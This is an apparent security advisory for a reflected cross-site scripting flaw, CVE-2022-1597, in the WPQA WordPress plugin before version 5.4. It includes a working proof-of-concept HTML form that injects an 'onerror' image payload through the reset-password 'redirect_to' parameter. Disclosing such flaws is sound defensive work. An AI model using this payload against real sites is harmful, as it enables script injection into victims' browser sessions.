WPQA < 5.4 – Reflected Cross-Site Scripting | CVE 2022-1597

Description

The plugin, used as a companion for the Discy and Himer themes, does not sanitise and escape a parameter on its reset password form which makes it possible to perform Reflected Cross-Site Scripting attacks

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <!-- The email address has to be the correct email address of a registered user for the payload to trigger. -->
      <input type="hidden" name="user_mail" value="valid@user.email" />
      <input type="hidden" name="form_type" value="wpqa_forget" />
      <input type="hidden" name="action" value="wpqa_ajax_password_process" />
      <input type="hidden" name="redirect_to" value="'<img src=x onerror=alert(1)>" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Video: https://www.youtube.com/watch?v=E2GRtf6prq8